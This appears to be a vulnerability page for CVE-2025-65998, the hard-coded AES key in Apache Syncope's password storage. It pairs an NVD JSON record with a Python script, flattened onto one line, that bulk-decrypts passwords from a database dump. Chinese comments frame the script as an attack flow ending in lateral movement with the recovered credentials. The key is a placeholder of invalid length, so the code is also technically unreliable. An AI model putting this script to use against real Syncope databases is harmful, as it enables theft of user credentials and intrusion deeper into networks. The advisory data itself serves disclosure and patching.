CVE-2025-65998

import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad import requests # Hardcoded AES key from Apache Syncope source code AES_KEY = b'YourHardcodedKeyHere12345678901234' # 替换为实际硬编码密钥 def decrypt_password(encrypted_password_b64): """使用硬编码密钥解密AES加密的密码""" try: encrypted_data = base64.b64decode(encrypted_password_b64) # AES-128-CBC mode, IV from first 16 bytes iv = encrypted_data[:16] ciphertext = encrypted_data[16:] cipher = AES.new(AES_KEY, AES.MODE_CBC, iv) decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size) return decrypted.decode('utf-8') except Exception as e: return f"Decryption failed: {str(e)}" # Example: Database dump extraction def extract_and_decrypt(db_passwords): """从数据库提取并解密密码""" results = [] for row in db_passwords: username = row['username'] encrypted_pwd = row['password'] decrypted_pwd = decrypt_password(encrypted_pwd) results.append({'username': username, 'password': decrypted_pwd}) return results # 攻击流程示例 # 1. 获取数据库访问权限 # 2. 提取password字段（已加密） # 3. 使用此脚本批量解密 # 4. 使用解密后的凭证进行横向移动

{"cve": {"id": "CVE-2025-65998", "sourceIdentifier": "[email protected]", "published": "2025-11-24T14:15:48.417", "lastModified": "2025-11-26T14:30:26.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache Syncope can be configured to store the user password values in the internal database with AES encryption, though this is not the default option.\n\nWhen AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker, once obtained access to the internal database content, to reconstruct the original cleartext password values.\nThis is not affecting encrypted plain attributes, whose values are also stored using AES encryption.\n\nUsers are recommended to upgrade to version 3.0.15 / 4.0.3, which fix this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndIncluding": "2.1.14", "matchCriteriaId": "D773E581-822F-4431-BEFB-48BE61A743EC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.15", "matchCriteriaId": "DE40E959-C93C-43E0-80AE-4FAB31C47165"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:syncope:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.3", "matchCriteriaId": "EFD9390D-0F3F-453D-ACCC-BFF74C6D9623"}]}]}], "references": [{"url": "https://lists.apache.org/thread/fjh0tb0d1xkbphc5ogdsc348ppz88cts", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/24/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}